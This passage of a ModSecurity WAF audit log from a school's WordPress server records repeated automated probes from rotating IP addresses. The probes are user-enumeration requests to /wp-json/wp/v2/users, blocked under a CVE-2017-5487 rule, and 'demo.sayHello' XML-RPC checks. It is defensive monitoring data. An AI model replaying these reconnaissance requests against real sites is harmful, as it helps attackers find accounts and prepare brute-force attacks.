Intercepted (phase 2) Stopwatch: 1747423811016857 3066 (- - -) Stopwatch2: 1747423811016857 3066; combined=1304, p1=463, p2=812, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9523e345-Z-- --a849d47a-A-- [17/May/2025:02:30:19 +0700] aCeSS9hEtho3ciA0wehdigAAAIY 103.236.140.4 53908 103.236.140.4 8181 --a849d47a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.89 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a849d47a-C-- demo.sayHello --a849d47a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a849d47a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423819664475 5655 (- - -) Stopwatch2: 1747423819664475 5655; combined=4183, p1=532, p2=3430, p3=32, p4=36, p5=91, sr=74, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a849d47a-Z-- --b1728272-A-- [17/May/2025:02:30:40 +0700] aCeSYNhEtho3ciA0wehdjQAAAJg 103.236.140.4 53924 103.236.140.4 8181 --b1728272-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b1728272-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1728272-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423840764253 3375 (- - -) Stopwatch2: 1747423840764253 3375; combined=1463, p1=481, p2=937, p3=0, p4=0, p5=45, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1728272-Z-- --2ab32f27-A-- [17/May/2025:02:30:45 +0700] aCeSZdhEtho3ciA0wehdjwAAAIM 103.236.140.4 53930 103.236.140.4 8181 --2ab32f27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2ab32f27-C-- demo.sayHello --2ab32f27-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ab32f27-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423845949468 5657 (- - -) Stopwatch2: 1747423845949468 5657; combined=4130, p1=498, p2=3408, p3=28, p4=33, p5=96, sr=74, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ab32f27-Z-- --07d30834-A-- [17/May/2025:02:31:24 +0700] aCeSjNhEtho3ciA0wehdkgAAAIk 103.236.140.4 53936 103.236.140.4 8181 --07d30834-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --07d30834-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07d30834-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423884303261 3047 (- - -) Stopwatch2: 1747423884303261 3047; combined=1241, p1=409, p2=803, p3=0, p4=0, p5=29, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07d30834-Z-- --95f7fa31-A-- [17/May/2025:02:31:29 +0700] aCeSkdhEtho3ciA0wehdkwAAAIc 103.236.140.4 53940 103.236.140.4 8181 --95f7fa31-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.165 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --95f7fa31-C-- demo.sayHello --95f7fa31-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --95f7fa31-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423889966869 6846 (- - -) Stopwatch2: 1747423889966869 6846; combined=4790, p1=632, p2=3907, p3=37, p4=42, p5=104, sr=109, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95f7fa31-Z-- --d18e6211-A-- [17/May/2025:02:32:08 +0700] aCeSuNhEtho3ciA0wehdlQAAAJA 103.236.140.4 53944 103.236.140.4 8181 --d18e6211-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.80.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.80.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d18e6211-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d18e6211-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423928467021 3352 (- - -) Stopwatch2: 1747423928467021 3352; combined=1470, p1=509, p2=928, p3=0, p4=0, p5=33, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d18e6211-Z-- --90211e3a-A-- [17/May/2025:02:32:13 +0700] aCeSvdhEtho3ciA0wehdlgAAAJE 103.236.140.4 53948 103.236.140.4 8181 --90211e3a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.78 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --90211e3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90211e3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423933349491 2809 (- - -) Stopwatch2: 1747423933349491 2809; combined=1259, p1=402, p2=827, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90211e3a-Z-- --a5439a39-A-- [17/May/2025:02:32:14 +0700] aCeSvthEtho3ciA0wehdlwAAAIg 103.236.140.4 53950 103.236.140.4 8181 --a5439a39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a5439a39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5439a39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423934121154 3162 (- - -) Stopwatch2: 1747423934121154 3162; combined=1392, p1=462, p2=899, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5439a39-Z-- --0b48a729-A-- [17/May/2025:02:32:14 +0700] aCeSvkE0LfP59mkCzg416AAAAMY 103.236.140.4 53952 103.236.140.4 8181 --0b48a729-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.80.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.80.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0b48a729-C-- demo.sayHello --0b48a729-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b48a729-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423934881052 5860 (- - -) Stopwatch2: 1747423934881052 5860; combined=4491, p1=477, p2=3743, p3=44, p4=42, p5=106, sr=92, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b48a729-Z-- --9331306a-A-- [17/May/2025:02:32:20 +0700] aCeSxNhEtho3ciA0wehdmQAAAJM 103.236.140.4 53958 103.236.140.4 8181 --9331306a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.78 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9331306a-C-- demo.sayHello --9331306a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9331306a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423940331908 5093 (- - -) Stopwatch2: 1747423940331908 5093; combined=3948, p1=466, p2=3273, p3=22, p4=25, p5=94, sr=67, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9331306a-Z-- --2686d623-A-- [17/May/2025:02:32:20 +0700] aCeSxNe6THFz1hsaJaLZFAAAAAQ 103.236.140.4 53962 103.236.140.4 8181 --2686d623-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.46 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2686d623-C-- demo.sayHello --2686d623-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2686d623-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423940861678 5333 (- - -) Stopwatch2: 1747423940861678 5333; combined=4045, p1=523, p2=3310, p3=29, p4=31, p5=90, sr=75, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2686d623-Z-- --e434aa12-A-- [17/May/2025:02:32:52 +0700] aCeS5NhEtho3ciA0wehdnQAAAJQ 103.236.140.4 53968 103.236.140.4 8181 --e434aa12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.105 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e434aa12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e434aa12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423972438021 3070 (- - -) Stopwatch2: 1747423972438021 3070; combined=1358, p1=465, p2=858, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e434aa12-Z-- --8c7e7e0d-A-- [17/May/2025:02:32:58 +0700] aCeS6thEtho3ciA0wehdnwAAAJI 103.236.140.4 53972 103.236.140.4 8181 --8c7e7e0d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.105 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8c7e7e0d-C-- demo.sayHello --8c7e7e0d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c7e7e0d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423978157273 4703 (- - -) Stopwatch2: 1747423978157273 4703; combined=3681, p1=426, p2=3050, p3=22, p4=25, p5=92, sr=67, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c7e7e0d-Z-- --fd04570c-A-- [17/May/2025:02:33:09 +0700] aCeS9UE0LfP59mkCzg416gAAAMs 103.236.140.4 53976 103.236.140.4 8181 --fd04570c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fd04570c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd04570c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747423989783005 3083 (- - -) Stopwatch2: 1747423989783005 3083; combined=1360, p1=459, p2=866, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd04570c-Z-- --43695e02-A-- [17/May/2025:02:33:16 +0700] aCeS_NhEtho3ciA0wehdogAAAII 103.236.140.4 53980 103.236.140.4 8181 --43695e02-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.193.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.193.247 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --43695e02-C-- demo.sayHello --43695e02-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --43695e02-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747423996200000 5571 (- - -) Stopwatch2: 1747423996200000 5571; combined=4047, p1=543, p2=3290, p3=29, p4=31, p5=91, sr=97, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43695e02-Z-- --1fad7324-A-- [17/May/2025:02:33:27 +0700] aCeTB9e6THFz1hsaJaLZFQAAAA0 103.236.140.4 53984 103.236.140.4 8181 --1fad7324-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1fad7324-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fad7324-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747424007883047 2337 (- - -) Stopwatch2: 1747424007883047 2337; combined=1109, p1=388, p2=693, p3=0, p4=0, p5=28, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fad7324-Z-- --7dc18834-A-- [17/May/2025:02:33:32 +0700] aCeTDNhEtho3ciA0wehdpQAAAIc 103.236.140.4 53988 103.236.140.4 8181 --7dc18834-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.147 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7dc18834-C-- demo.sayHello --7dc18834-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7dc18834-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file 